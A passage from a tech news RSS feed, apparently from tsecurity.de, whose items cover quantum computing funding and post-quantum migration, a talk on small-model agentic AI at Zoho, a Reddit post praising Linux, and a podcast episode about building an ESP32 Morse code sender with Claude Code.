<p class="wp-block-paragraph">This past May, <a href="https://www.psiquantum.com/news-import/us-department-of-commerce">PsiQuantum also announced $100 million</a> from the Department of Commerce, part of the CHIPS and Science Act, to accelerate domestic manufacturing of critical quantum computing components.</p>



<p class="wp-block-paragraph">Microsoft and PsiQuantum are both in Stage C, bypassing the sequential path that other companies are expected to follow, because they were both part of DARPA’s predecessor to QBI, the Underexplored Systems for Utility-Scale Quantum Computing program.</p>



<h2 class="wp-block-heading">Genesis Mission</h2>



<p class="wp-block-paragraph">Genesis Mission was <a href="https://www.whitehouse.gov/presidential-actions/2025/11/launching-the-genesis-mission/">launched</a> in late 2025 with the goal of using AI to accelerate scientific breakthroughs, and it now includes more than 15 government agencies.</p>



<p class="wp-block-paragraph">As part of the Genesis Mission, quantum computing and sensing company Infleqtion announced <a href="https://infleqtion.com/infleqtion-secures-three-genesis-mission-projects-from-u-s-department-of-energy/">three projects for the Department of Energy</a> on Wednesday. The three projects focus on quantum circuit design for nuclear applications, atomic quantum sensing, and nuclear fusion energy research.</p>



<p class="wp-block-paragraph">This announcement did not include the total monetary value of the projects, but, in May, the company announced a separate agreement with the Department of Commerce for $100 million to accelerate Infleqtion’s neutral-atom technology roadmap.</p>



<p class="wp-block-paragraph">Other quantum-related Genesis Mission projects announced this week include $1.5 million for a <a href="https://www.bluequbit.io/blog/bluequbit-and-partners-awarded-1-5m-in-doe-genesis-mission-grants-to-advance-ai-driven-quantum-error-correction">BlueQubit quantum error correction project</a> with Microsoft and other partners, a <a href="https://news.stanford.edu/stories/2026/07/stanford-and-slac-to-lead-genesis-mission-projects-that-tackle-the-nation-s-most-complex-science-and-technology-challenges">Stanford effort</a> to model the behavior of electrons at quantum scale, an <a href="https://news.mit.edu/2026/mit-projects-selected-funding-under-doe-genesis-mission-0723">MIT quantum sensing project</a>, Argonne National Laboratory <a href="https://www.anl.gov/article/argonne-to-lead-ai-research-projects-under-the-department-of-energys-genesis-mission">projects</a> on quantum circuit design and quantum sensors, Brookhaven Lab <a href="https://www.bnl.gov/newsroom/news.php?a=123041">quantum sensor projects</a>, and quantum computing <a href="https://news.northwestern.edu/stories/2026/07/northwestern-projects-receive-genesis-mission-funding">projects</a> at Northwestern University.</p>



<p class="wp-block-paragraph">IBM, one of three dozen private companies that are part of the <a href="https://www.genesismissionconsortium.org/our-members#private-sector">Genesis Mission Consortium</a>, announced that it will be leading a <a href="https://research.ibm.com/blog/ibm-us-genesis-mission-quantum-ai">project</a> to support more effective quantum applications, and will contribute up to $50 million of quantum compute access for the Genesis Mission.</p>



<h2 class="wp-block-heading">Enterprise priorities</h2>



<p class="wp-block-paragraph">This week’s quantum announcements aren’t a sign that enterprises need to run out and buy quantum computers, says IDC’s West. But they do need to start preparing for the quantum era — such as by identifying business areas where quantum computing could become a competitive differentiator over the next decade.</p>



<p class="wp-block-paragraph">But the most immediate threat is that of adversaries using quantum computers to break current encryption standards. Organizations should be inventorying cryptographic assets and developing a roadmap for the migration to quantum-proof algorithms, West says.</p>



<p class="wp-block-paragraph"><a href="https://www.networkworld.com/article/4158139/fixing-encryption-isnt-enough-quantum-developments-put-focus-on-authentication.html">The point of no return is closer than ever</a>, and many major players in the encryption and communication space, including Google and Cloudflare, have been accelerating their timelines. In fact, this Wednesday was the <a href="https://www.whitehouse.gov/presidential-actions/2026/06/securing-the-nation-against-advanced-cryptographic-attacks/">federal deadline</a> for naming their post-quantum cryptography migration leads under a June executive order.</p>



<p class="wp-block-paragraph">“The preparation that needs to be done to prepare is to implement post-quantum cryptography yesterday,” says Forrester’s Mooter.</p>



<p class="wp-block-paragraph">However, according to a survey <a href="https://www.digicert.com/news/quantum-security-deployment-remains-stuck">released by DigiCert this morning</a>, while 87% of organizations are planning, testing or implementing PQC initiatives, only 7% of organizations have deployed quantum-safe or hybrid cryptography across most of their digital certificates.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Smaller, smarter, safer: How to build agentic AI on the right foundation]]></title>
<description><![CDATA[When it comes to building an effective AI stack, context is king and power isn’t everything it’s cracked up to be.



“Smaller, smarter, safer — this is a bet our company has taken in how we deploy AI internally,” said Ricky Thakrar, head of sales and account management at Zoho, provider of a sui...]]></description>
<link>https://tsecurity.de/de/3688632/it-nachrichten/smaller-smarter-safer-how-to-build-agentic-ai-on-the-right-foundation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688632/it-nachrichten/smaller-smarter-safer-how-to-build-agentic-ai-on-the-right-foundation/</guid>
<pubDate>Thu, 23 Jul 2026 12:04:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">When it comes to building an effective AI stack, context is king and power isn’t everything it’s cracked up to be.</p>



<p class="wp-block-paragraph">“Smaller, smarter, safer — this is a bet our company has taken in how we deploy AI internally,” said Ricky Thakrar, head of sales and account management at Zoho, provider of a suite of popular cloud-based software solutions for sales, marketing, and finance.</p>



<p class="wp-block-paragraph">“I’m on the business side, and so decisions made by our CIO and IT folks affect me directly, and my teams’ workflows and processes,” he added.</p>



<p class="wp-block-paragraph">Speaking to a room of tech leaders at the <a href="https://event.foundryco.com/cio-100-leadership-live-new-york/">CIO 100 Leadership Live New York event</a> last week, Thakrar explained that every company wants the speed of AI-generated work wedded to the quality of human work, even though these two are diametrically opposed. No amount of model upgrades or spend will close that gap, so the only way forward is to architect your way out. Thakrar encapsulated this idea in a simple formula:</p>



<ul class="wp-block-list">
<li>Smaller: Stop deploying maximum firepower on every task. Many tasks don’t need it.</li>



<li>Smarter: The system around the model decides more than the model does.</li>



<li>Safer: Verify at the point a mistake gets locked in, not just downstream of it.</li>
</ul>



<p class="wp-block-paragraph">He noted that organizations that win with AI won’t be those deploying the biggest, most powerful models or the most sophisticated architecture, but the ones that figure out that the model is the easy part and the right architecture is harder. That means understanding the hardest element, and the biggest differentiator, is building a human system that learns and compounds alongside agentic systems.</p>



<p class="wp-block-paragraph">To get it right, organizations need to prioritize the context layer. The size of frontier models like the GPT series, Claude, and Gemini mostly exist to compensate for missing context, Thakrar explained. Without enough context, models need to be able to reason harder and infer more about what a user actually means because it doesn’t know the user’s account, process, or history. A rich context layer makes it possible for enterprises to run workloads on much smaller, lower-power models.</p>



<p class="wp-block-paragraph">“The intelligence moves from the model into the architecture around it,” he said.</p>



<h2 class="wp-block-heading">A steep learning curve</h2>



<p class="wp-block-paragraph">One of Zoho’s earliest AI agents was a churn management agent to help the account management team detect churn in customer subscriptions. So when a subscription became inactive, the agent would collect context from notes, meeting recordings, and Zoho’s data enrichment tool, then create a summary of reasons the account might have churned, and schedule a call.</p>



<p class="wp-block-paragraph">“What happened was I got this churn agent a couple months later, already embedded in our CRM, and within a week my team no longer trusted that agent,” Thakrar said. “The reason is we forgot to collect one very key point.”</p>



<p class="wp-block-paragraph">In Zoho’s CRM, when a customer buys a bundle of products, that bundle is represented as a single line item. That means the status of any products the customer may have previously purchased individually changes to inactive as they’re moved to the bundle. That’s not churn, but it was interpreted it that way. Zoho fixed it in the second version of the agent.</p>



<p class="wp-block-paragraph">Then a new problem arose. Many potential customers first purchase Zoho products as pilots or sandboxes. As those customers move from pilot to live instance, they close down the pilot versions. And again, the CRM would record that as subscriptions going inactive.</p>



<p class="wp-block-paragraph">“The trust deteriorates again because everyone got excited for version 2,” Thakrar said.</p>



<p class="wp-block-paragraph">Sometimes, a certain product might not be the best fit for a customer and Thakrar’s team will suggest the customer move to another product. That’s deliberate churn, not a churn risk.</p>



<p class="wp-block-paragraph">“You may have a similar story like this where the agent sounds so good, it’s going to do something quick and add value, but it’s missing context from the account managers, and there are so many more pieces we’re still building out,” Thakrar said. “It’s been almost a year and the problem I have is my team still doesn’t trust it. They’ll see [a message from the agent] and go out and do all the research anyway to make sure it gave the correct answer.”</p>



<p class="wp-block-paragraph">The team is more on top of potential churn, though, but the promised productivity gains have yet to materialize because the agent has to earn back lost trust due to a lack of context.</p>



<p class="wp-block-paragraph">“My goal for this year is having an AI-assisted customer journey from sales to account management where the handoff is clean, the context flows, and every piece of information we gather about a customer is weighed, identified, and coached so the sales team can close more deals,” he said.</p>



<p class="wp-block-paragraph">Zoho’s early experience with agents has led to the idea that constrained, context-rich, deterministic architectures consistently outperform expensive models bolted onto fragmented systems. It all comes down to three pillars: routing, harness, and specialization.</p>



<h3 class="wp-block-heading">Routing</h3>



<p class="wp-block-paragraph">Routing is about sending workloads to the proper model for the job, which entails providing enough context to a given task that a small, cheap model can handle it without the need for spare reasoning capacity to fill gaps.</p>



<p class="wp-block-paragraph">Frontier models are expensive and companies can burn through a year’s budget worth of tokens in months. But most tasks can be handled by much smaller, more constrained models at a fraction of the cost.</p>



<p class="wp-block-paragraph">“You don’t always have to pay the frontier guys for every task,” he said. “We’ve observed with some clients that we could save them 95% with a 3 billion parameter model.”</p>



<h3 class="wp-block-heading">Harness</h3>



<p class="wp-block-paragraph">An AI agent harness is the software infrastructure scaffolding around an LLM that differentiates an agent from a chatbot. It’s what enables an agent to act on tasks rather than simply respond to prompts. A model reasons through a problem and decides what to do about it. The harness connects the model to the tools, systems, memory, guardrails, and execution environments required to perform the actions determined by the model. The term is frequently used more or less interchangeably with orchestration layer.</p>



<p class="wp-block-paragraph">“It’s the process around the model, which matters way more than the model itself,” Thakrar said.</p>



<p class="wp-block-paragraph">In benchmark tests, a superior harness on a less powerful model produces better results than an inferior harness on a much bigger model.</p>



<p class="wp-block-paragraph">For the best results, Thakrar said, it’s essential to understand the deterministic and non-deterministic elements of a given workload, and build that into the architecture. Machines can read, organize, and validate, and they excel at deterministic tasks. Humans, on the other hand, are exceptional at non-deterministic tasks like judging, synthesizing, and deciding.</p>



<p class="wp-block-paragraph">Those non-deterministic tasks in a process are the ideal point for AI agents to incorporate a human in the loop, what Thakrar calls human harness. He pointed to a stakeholder mapping agent Zoho built for sales as an example, which takes the context of an initial meeting and third-party enriched data like a LinkedIn profile, weighs probabilities, and makes an educated guess about the stakeholder map.</p>



<p class="wp-block-paragraph">“The initial goal was just to eliminate that task completely from the human workflow,” he said. “The stakeholder map is done, it’s in the folder, and you can look at it.”</p>



<p class="wp-block-paragraph">But the agent would struggle to capture nuance. The meanings of titles in organizations always vary, and the politics and dynamics of any given meeting can be difficult for an AI agent to discern. Rather than keep feeding the agent data to try to make it intelligent enough to make those determinations, it was simpler and more efficient for the agent to create a proposed stakeholder map and hand it over to a human who could make changes and explain why those changes were necessary.</p>



<p class="wp-block-paragraph">Ultimately, Thakrar said the agent still saved human team members time because the stakeholder map was usually pretty close, and the corrections also helped the model grow smarter by adding richer context.</p>



<h3 class="wp-block-heading">Specialization</h3>



<p class="wp-block-paragraph">Specialization is transitioning a process from testing on a frontier model to production on a much narrower, smaller model. Once you’ve proven that an agent can do a job well, you want to stop paying master-craftsman rates to keep doing that one job well.</p>



<p class="wp-block-paragraph">Specialization is all about capturing your subject matter experts’ best judgement and pattern recognition to build an open-weight, open source, trained, and fine-tuned model that can be deployed in your own data center.</p>



<p class="wp-block-paragraph">“The true enterprise bet is to keep that orchestration layer, which is your IP and knowledge, in house,” Thakrar said. “You don’t want to host that on someone else’s model. The goal of everyone in enterprise should be to run, train, and host their own models.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Renewed appreciation]]></title>
<description><![CDATA[Been mainly using linux for close to 20 years, with occasional windows use for certain software. So I’m just used to it. I’m still using (occasionally) a 2012 Thinkpad t420. Works just fine for what I need it to do, though admittedly modern websites bring it to its limits. New job has me using a ...]]></description>
<link>https://tsecurity.de/de/3687871/linux-tipps/renewed-appreciation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687871/linux-tipps/renewed-appreciation/</guid>
<pubDate>Thu, 23 Jul 2026 04:21:41 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Been mainly using linux for close to 20 years, with occasional windows use for certain software. So I’m just used to it. I’m still using (occasionally) a 2012 Thinkpad t420. Works just fine for what I need it to do, though admittedly modern websites bring it to its limits.</p> <p>New job has me using a windows thinkpad with teams and outlook and edge and all that. Lord have mercy. 16GB of RAM are always close to full even with my apps only using 3-4GB max. A click or button takes a second or more for anything to happen, the thing runs hot af with me doing nothing but reading a webpage. </p> <p>It’s so bad. I knew Linux was better before, but I wasn’t aware just how much better. How terribly bloated and worse Windows has become since the XP days. I had no idea.</p> <p>Every day when I get home I need to briefly touch my own computer, just so I don’t end up hating computers in general. </p> <p>Wow.</p> <p>P.S.: and I have to use a bloody mouse again. My arm hurts…</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/InevitablePetrus"> /u/InevitablePetrus </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1v3zuix/renewed_appreciation/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1v3zuix/renewed_appreciation/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4689: Cheap Yellow Display Project Part 8: Writing the code]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.



Hello, again. This is Trey.










Welcome to part 8 in my Cheap Yellow Display (CYD) Project series.  










If you wish to catch up on earlier episodes, you can find them on my 

HPR profile page



https://www.hackerp...]]></description>
<link>https://tsecurity.de/de/3687798/podcasts/hpr4689-cheap-yellow-display-project-part-8-writing-the-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687798/podcasts/hpr4689-cheap-yellow-display-project-part-8-writing-the-code/</guid>
<pubDate>Thu, 23 Jul 2026 02:06:01 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>

Hello, again. This is Trey.

</p>

<p>


</p>

<p>

Welcome to part 8 in my Cheap Yellow Display (CYD) Project series.  

</p>

<p>


</p>

<p>

If you wish to catch up on earlier episodes, you can find them on my 
<a href="https://www.hackerpublicradio.org/correspondents/0394.html" rel="noopener noreferrer" target="_blank">
HPR profile page</a>


<a href="https://www.hackerpublicradio.org/correspondents/0394.html" rel="noopener noreferrer" target="_blank">
https://www.hackerpublicradio.org/correspondents/0394.html</a>



</p>

<p>


</p>

<p>

It is hard to believe that I started this project and the HPR series to document it more than a year ago.  Time flies.  Life happens. I spent the last 8 months so focused on work related activities that I had to set the project aside.  And once I set it aside, it was difficult to get back to again.  The one time I tried, I found that my son's old Windows laptop, which I had commandeered to use for the project, was once and truly dead.  

</p>

<p>


</p>

<p>

We live in a different world now than we did when I began this project.  Today, everything is about AI – how it is changing our world, increasing efficiencies, and even displacing certain types of jobs.  "Vibe coding" is transforming the way we make software, and now everyone is a developer.

</p>

<p>


</p>

<p>

Within my organization, we are all being strongly encouraged to learn more about AI and apply it in our daily work.  We are blessed to have access to a wide range of training and to powerful tools which support the process.  Several colleagues within my organization and outside my organization have recommended Claude Code -- for development, for organization, for brainstorming, and for much more.  My role is not that of a developer, and I have had no need for Claude Code at work.  There are plenty of other tools for me to use.

</p>

<p>


</p>

<p>

But at home, I thought... I could install Claude Code at home to experiment with and to learn.  And then it hit me.  I wonder if I could use Claude Code to help me with my stalled CYD project.  

</p>

<p>


</p>

<p>

"Hello, my name is Trey, and I am a fraud."

</p>

<p>


</p>

<p>

OK.  I don't think I am a fraud, but having never used such a powerful tool to help me code, I feel a little bit like a fraud, with Claude doing the work for me. Let's talk through what we did.

</p>

<p>


</p>

<p>

As I mentioned, I was unable to use the laptop on which I created the original GUI code.  But no worries, because It was all on GitHub, right?

</p>

<p>


</p>

<p>

So, I began by trying to install Claude Code on one of my Ubuntu machines.  That failed miserably, and all the instructions I found online recommended running it on Windows.  So I transitioned to installing Claude Code on a freshly built Windows 10 system using some old hardware which will not support Windows 11.  Surprisingly, It seems that Claude wants to run within Ubuntu on Windows Subsystem for Linux (WSL).

</p>

<p>


</p>

<p>

Once I went through all the hoops for installing and setting up my basic subscription, I got to work.  I created a new directory to use for all my project files, and another one for Claude to write all its output files to.

</p>

<p>


</p>

<p>

Everything I have read and heard about using Claude Code for a project like this recommended beginning by using Claude to create the project plan.  So my first prompt was as follows:

</p>

<p>


</p>

<p>

"I am building a project using an ESP32 cheap yellow display. The final goal is to have a device with a graphical user interface which will allow me store several text messages, each assigned to their own specific button. Then, when one of the buttons is pressed, the message will be converted into morse code, and the message will be sent by blinking an onboard LED. I already have the initial design for the GUI coded in my github repository. Please construct a detailed step by step plan for building this application"

</p>

<p>


</p>

<p>

I wanted to keep it simple at the beginning, so even though I plan to use an opto-isolated relay for the output, I am starting out using the built in LED.

</p>

<p>


</p>

<p>

Claude asked me for the URL for my Github repository, and I provided it.  After thinking for a bit, it produced a project plan.

</p>

<p>


</p>

<p>

CYD Morse Sender — Step-by-Step Build Plan

</p>

<p>


</p>

<p>

What You Already Have

</p>

<p>

- 3 fully designed LVGL screens (Send, Config, Keyboard)

</p>

<p>

- 7 send buttons with green styling on the Send Screen

</p>

<p>

- Speed slider (5–30 WPM) and program slot dropdown on Config Screen

</p>

<p>

- Text area + LVGL keyboard widget on Keyboard Screen

</p>

<p>

- Display driver and touchscreen hardware initialized (but touch read was stubbed out)

</p>

<p>

---

</p>

<p>

Phase 1: Fix Touchscreen Input

</p>

<p>

Initialize the XPT2046 on VSPI, replace the hardcoded touched = false with real touch data, calibrate raw ADC coordinates to screen pixels, and verify all three nav buttons transition screens correctly.                         

</p>

<p>


</p>

<p>

Phase 2: Persistent Message Storage

</p>

<p>

Use Preferences.h / NVS to store 7 messages ("msg0" – "msg6") that survive power cycles. Load on boot and populate send button labels.

</p>

<p>


</p>

<p>

Phase 3: Config Screen — Slot Selection &amp; Speed

</p>

<p>

Wire the Program dropdown to g_selectedSlot, wire the Speed slider to g_wpm with a live WPM label, and wire the Set button to clear the text area and navigate to the Keyboard Screen.

</p>

<p>


</p>

<p>

Phase 4: Keyboard Screen — Capture and Save Text

</p>

<p>

On keyboard OK (LV_EVENT_READY): read the text area, save to NVS, update the send button label, navigate back. On Cancel: navigate back without saving.

</p>

<p>


</p>

<p>

Phase 5: Morse Code Engine

</p>

<p>

Build morse.h with the full A–Z / 0–9 lookup table, a textToMorse() converter, and Paris-standard timing (unit_ms = 1200 / wpm).

</p>

<p>


</p>

<p>

Phase 6: Non-Blocking LED Transmission

</p>

<p>

State machine (IDLE / LED_ON / LED_OFF) driven by millis() in a morseUpdate() function called every loop — no delay().   LED on GPIO 17 (blue).

</p>

<p>


</p>

<p>

Phase 7: Wire the Send Buttons

</p>

<p>

Each button calls startMorse(getMessage(slot)) if not already transmitting. Disable all send buttons during TX; re-enable when the state machine reaches the end.

</p>

<p>


</p>

<p>

Phase 8: Integration &amp; Polish

</p>

<p>

Stop button, WPM persistence, empty-slot guard, serial debug output, final touch calibration, end-to-end test checklist.

</p>

<p>

---

</p>

<p>

Recommended order: Phase 1 → 2 → 7 (partial) → 5 → 6 → 7 (full) → 3 → 4 → 8

</p>

<p>


</p>

<p>


</p>

<p>

This was wild!  Claude determined exactly how far along I was in the project, and also alerted me to the fact that the "touch read was stubbed out".  Ugh.  This means that the files I had uploaded to GitHub were my original GUI files (Episode 05 – HPR4532 - 
<a href="https://hackerpublicradio.org/eps/hpr4532/index.html" rel="noopener noreferrer" target="_blank">
https://hackerpublicradio.org/eps/hpr4532/index.html</a>

) and not the ones that I finally got working properly (Episode 07 – HPR4624 - 
<a href="https://hackerpublicradio.org/eps/hpr4624/index.html" rel="noopener noreferrer" target="_blank">
https://hackerpublicradio.org/eps/hpr4624/index.html</a>

).  That was my own fault.  Did I mention that I don't get Git?  I REALLY need to learn to properly use Git!

</p>

<p>


</p>

<p>

But, we have a plan, broken down by eight numbered phases.  And they seem to address all the functionality I wanted with a few additional things I had not thought about.  Interestingly, even though these phases are sequentially numbered, Claud recommended that we approach them in a bizarre order: Phase 1 → 2 → 7 (partial) → 5 → 6 → 7 (full) → 3 → 4 → 8 .

</p>

<p>


</p>

<p>

Alright.  Let's see what we can do.  The first phase is to fix the touchscreen input.  

</p>

<p>


</p>

<p>

Claude took me through it step-by-step, asking as it needed to read specific project files.

</p>

<p>


</p>

<p>

Finally, it wrote a new ui.ino code file to my speficied output directory for me to test.  I copied it into the correct file location, said a quick prayer, compiled in Arduino IDE, and downloaded to the CYD.

</p>

<p>


</p>

<p>

Well, that is... interesting.  The display looked nothing like it was supposed to.  There were vertical green bars with smaller dashed green vertical stripes in them. I will include a picture in the show notes so that you can see what it looked like and why it was so difficult to describe.  

</p>

<p>


</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_1.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_1_tn.jpeg">
</a>

</p>

<p>


</p>

<p>

I spent the next hour or so trying to explain what I was seeing to a chat bot.  Claude recommended potential fixes which either did nothing or made the situation worse.  I began questioning whether this was a good idea, how people actually gained efficiencies talking to a bot, and even several life choices.  

</p>

<p>


</p>

<p>

Then I had a thought.  I prompted Claude:

</p>

<p>


</p>

<p>

If I were to take a picture of the screen on the cheap yellow display and copy it into the output folder, would you be able to analyze it to better determine what is wrong and how to fix it?

</p>

<p>


</p>

<p>

Shockingly, Claude answered in the affirmative, and told me to copy the picture to the output folder and let it know when to proceed.  It analyzed the picture and more of the supporting files it had copied from my GitHub, asking each time if it could access that file.  It determined that my original code was written for a flavor of LVGL version 8 and I was now using LVGL 9.5.  

</p>

<p>


</p>

<p>

It recommended changes, and then asked permission to make those changes, file by file.  .h files &amp; .c files,  Finally, I just gave it permission to edit the files in the project folder without asking for permission for each file each time.  Claude was still explaining each change, showing me exactly what would be changed, and asking for permission, so that I could review all of the changes.  But now it was not asking additional permission to write to each of the impacted files.

</p>

<p>


</p>

<p>

Next, Code compiled and downloaded.  Different screen, but not right. Again, I took a picture and gave it to Claude to analyze.  So, Claude paused and altered the code to generate a specific test pattern overtop of the GUI.

</p>

<p>


</p>

<p>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_2.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4689/hpr4689_image_2_tn.jpeg">
</a>

</p>

<p>


</p>

<p>

The test pattern was supposed to cover the entire rectangular screen.  But parts of the pattern were in a square on the screen and parts were not.  Another photograph and analysis, told Claude that there were some rotation/screensize issues.

</p>

<p>


</p>

<p>

We repeated this several times.  Some resulted in improvement, and others did not.

</p>

<p>


</p>

<p>

This is the point where I noticed something interesting. Not about Claude, specifically, or about the app.  But I noticed something interesting about myself and about the process.

</p>

<p>


</p>

<p>

Previously, when I was working through some of these challenges without Claud, I found myself becoming more and more stressed, frustrated, and angry, until I found a solution.  Then another problem would repeat the cycle.  Success in the end was great, but the emotional extremes during the process were not always pleasant.  

</p>

<p>


</p>

<p>

Now, I was effectively managing the project, and relaying information to the resource responsible for fixing the problems -- a very different experience.

</p>

<p>


</p>

<p>

But I also ran into another issue.  Claude became absolutely certain that the problem revolved around the device not accurately knowing where the 4 corners of the screen were.  But in reality, the output of the test pattern was rotated 90 degrees from the actual screen.  It took several iterations of me insisting that the problem had to do with screen orientation and not corner coordinates.  It was interesting to experience the tool doubling down on an obvious mistake, but we finally resolved that.

</p>

<p>


</p>

<p>

Again, while it was frustrating, it was much less stressful.

</p>

<p>


</p>

<p>


</p>

<p>

We proceeded to 
<strong>

<em>
Phase 2: Persistent Message Storage</em>

</strong>

where we ensured that the button labels on the send screen were stored in the devices persistent storage, so that, when they are edited to contain the message they should send, that information would survive a reboot.

</p>

<p>


</p>

<p>

Next, we combined elements of 
<strong>

<em>
Phase 5: Morse Code Engine</em>

</strong>

, 
<strong>

<em>
Phase 6: Non-Blocking LED Transmission</em>

</strong>

, and 
<strong>

<em>
Phase 7: Wire the Send Buttons</em>

</strong>

together. Building the morse code engine was an area I had been thinking about for a while.  I already had working parts of something similar in the Arduino practice oscillator I have referenced a few times in this series.  The code for the practice oscillator may be found on my GitHub, but it was all based on original code from jmharvey1, with my only contribution being making pin assignments variables so that the code could easily be ported to different devices.  

</p>

<p>


</p>

<p>

So, I was happy that we were building the morse code engine directly.  The code for it may be found in morse.h, which uses a constant character lookup table to define each character.  Without any specific direction from me, Claude used the PARIS timing methods I have already described within Episode 6 of this series.  It defines timing for DOT, DASH, LETTER_GAP, and WORD_GAP, and all are based on a simple calculation of 1200 ms / the number of words per minute (WPM) we wish to transmit.

</p>

<p>


</p>

<p>

Along the way, we discovered that, if we tried to use the delay() function, it would crash the program due to a conflict with the LVGL timer used for touchscreen inputs. Claude altered all the delays accordingly.

</p>

<p>


</p>

<p>

Then, 
<strong>

<em>
Phase 3: Config Screen — Slot Selection &amp; Speed</em>

</strong>

allowed us to configure the WPM we wished to use in addition to selecting a specific Send button to reconfigure.  This forced us to work on 
<strong>

<em>
Phase 4: Keyboard Screen — Capture and Save Text</em>

</strong>

which is used to type the entries for each Send button.  At this point, I also decided that we would want to also use the Keyboard Screen to send ad hoc morse as we typed it.

</p>

<p>


</p>

<p>

During this phase we discovered several bugs which seemed to cause random freezes.  Careful troubleshooting with messages output to the Arduino IDE's serial console helped us narrow down the causes and remedy them.

</p>

<p>


</p>

<p>

Finally all the tests worked and I am able to merrily pre-configure macro buttons with custom messages and use the CYD to send the morse code for those messages to the on-board LED at whichever rate I specify.

</p>

<p>


</p>

<p>

I have noticed in my presentation of this narrative that I repeatedly slip into the first person plural terms "we" and "us" instead of the first person singular terms "I" and "me".  I have unconsciously personified Claud and recognized it as an integral part of my (formerly one person) development team.

</p>

<p>


</p>

<p>

I finally configured Claude to connect to my GitHub repo and upload all the files and documentation. We additionally created a CYD-Narrative.md file which describes in more detail all the work which was done on the project.  I still do not 100% get git, but we are successfully using it.

</p>

<p>


</p>

<p>

You can find all these files in my GitHub repo (
<a href="https://github.com/jttrey3/CYD_MorseSender" rel="noopener noreferrer" target="_blank">
https://github.com/jttrey3/CYD_MorseSender</a>

) where they are shared under a GPL 3.0 license.

</p>

<p>


</p>

<p>

There are still several additional steps I plan to complete in the next few months.  

</p>

<p>


</p>

<p>

1. I will be integrating an opto-isolated relay which will allow me to plug the device into the straight key input on any amateur radio.  This will require a battery power source, charge controller, and more hardware.

</p>

<ol>

<li>

I... make that "We" (Claude &amp; I)  will be modifying the code to support an audio side tone through an attached speaker when sending code

</li>

<li>

We will add an output selection switch to the config page to choose any combination of speaker, relay, or LED as output.

</li>

<li>

We will develop a downloadable firmware which I hope to share with the Cheap Yellow Display community.

</li>

</ol>

<p>


</p>

<p>

If you can think of any additional features you would like to see integrated, please drop me an email using the address in my HPR profile.

</p>

<p>


</p>

<p>

I may also work with a friend to attempt to 3d print a case for the entire contraption, and I will be sure to record additional episodes sharing the process.

</p>

<p>


</p>

<p>

I have learned so much throughout this project, about the CYD, ESP32, GUIs, Claude Code, GitHub, and most of all, about myself.  

</p>

<p>


</p>

<p>

Does using AI to develop this code make me a fraud? It still feels like it in some ways.  

</p>

<p>


</p>

<p>

Does it make me more productive?  ABSOLUTELY!  I made consistent forward progress when I only had 30-60 minutes each day to work on it, and everything discussed in this episode was completed in less than a week.  If I had been able to work on it for a few hours uninterrupted, it may have only taken me 3-5 hours.

</p>

<p>


</p>

<p>

Does it empower and inspire me to do more projects like this?  100%  I feel like I had support working with me the whole way.  I was less stressed overall, and it had less of an impact on the amount of and quality of time I spent with my family.

</p>

<p>


</p>

<p>

I will be wrapping up this series soon, without any more 6 month gaps, I hope.

</p>

<p>


</p>

<p>

Until next time...

</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4689/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This $2 low-tech upgrade just made Russia's cheap 'cardboard-and-plywood' drone almost unjammable]]></title>
<description><![CDATA[Russia has reportedly added magnetic compasses to cheap Molniya drones, helping maintain direction when electronic warfare disrupts GPS and GLONASS signals.]]></description>
<link>https://tsecurity.de/de/3687526/it-nachrichten/this-2-low-tech-upgrade-just-made-russias-cheap-cardboard-and-plywood-drone-almost-unjammable/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687526/it-nachrichten/this-2-low-tech-upgrade-just-made-russias-cheap-cardboard-and-plywood-drone-almost-unjammable/</guid>
<pubDate>Wed, 22 Jul 2026 22:26:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Russia has reportedly added magnetic compasses to cheap Molniya drones, helping maintain direction when electronic warfare disrupts GPS and GLONASS signals.]]></content:encoded>
</item>
<item>
<title><![CDATA[Loop Engineering for RAG Generation: iterate top-k one at a time]]></title>
<description><![CDATA[Enterprise Document Intelligence [Vol.1 #8bis] - Two regimes for sending retrieved candidates to the generation brick, the sufficiency signal that picks between them, and the per-question type dispatch that makes it cheap
The post Loop Engineering for RAG Generation: iterate top-k one at a time a...]]></description>
<link>https://tsecurity.de/de/3687062/ai-nachrichten/loop-engineering-for-rag-generation-iterate-top-k-one-at-a-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687062/ai-nachrichten/loop-engineering-for-rag-generation-iterate-top-k-one-at-a-time/</guid>
<pubDate>Wed, 22 Jul 2026 18:49:16 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
